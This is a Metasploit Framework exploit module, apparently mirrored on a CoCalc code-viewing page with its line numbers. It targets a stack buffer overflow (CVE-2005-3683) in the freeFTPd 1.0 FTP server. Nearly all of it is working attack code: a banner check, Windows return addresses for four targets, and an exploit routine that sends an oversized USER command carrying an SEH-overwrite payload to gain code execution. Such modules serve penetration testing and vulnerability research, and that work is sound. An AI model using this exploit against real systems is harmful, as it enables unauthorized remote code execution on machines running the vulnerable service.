Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/freeftpd_user.rb
19850 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Ftp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'freeFTPd 1.0 Username Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in the freeFTPd

19
          multi-protocol file transfer service. This flaw can only be

20
          exploited when logging has been enabled (non-default).

21
        },

22
        'Author' => 'MC',

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2005-3683'],

26
          [ 'OSVDB', '20909'],

27
          [ 'BID', '15457']

28
        ],

29
        'Privileged' => false,

30
        'Payload' => {

31
          'Space' => 800,

32
          'BadChars' => "\x00\x20\x0a\x0d",

33
          'StackAdjustment' => -3500,

34
        },

35
        'Platform' => %w{win},

36
        'Targets' => [

37
          [

38
            'Windows 2000 English ALL',

39
            {

40
              'Platform' => 'win',

41
              'Ret' => 0x75022ac4,

42
            },

43
          ],

44
          [

45
            'Windows XP Pro SP0/SP1 English',

46
            {

47
              'Platform' => 'win',

48
              'Ret' => 0x71aa32ad,

49
            },

50
          ],

51
          [

52
            'Windows NT SP5/SP6a English',

53
            {

54
              'Platform' => 'win',

55
              'Ret' => 0x776a1799,

56
            },

57
          ],

58
          [

59
            'Windows 2003 Server English',

60
            {

61
              'Platform' => 'win',

62
              'Ret' => 0x7ffc0638,

63
            },

64
          ],

65
        ],

66
        'DisclosureDate' => '2005-11-16',

67
        'Notes' => {

68
          'Reliability' => UNKNOWN_RELIABILITY,

69
          'Stability' => UNKNOWN_STABILITY,

70
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

71
        }

72
      )

73
    )

74
  end

75


76
  def check

77
    connect

78
    disconnect

79
    if (banner =~ /freeFTPd 1\.0/)

80
      return Exploit::CheckCode::Appears

81
    end

82


83
    return Exploit::CheckCode::Safe

84
  end

85


86
  def exploit

87
    connect

88


89
    print_status("Trying target #{target.name}...")

90


91
    buf = rand_text_english(1816, payload_badchars)

92
    seh = generate_seh_payload(target.ret)

93
    buf[1008, seh.length] = seh

94


95
    send_cmd(['USER', buf], false)

96


97
    handler

98
    disconnect

99
  end

100
end

101


102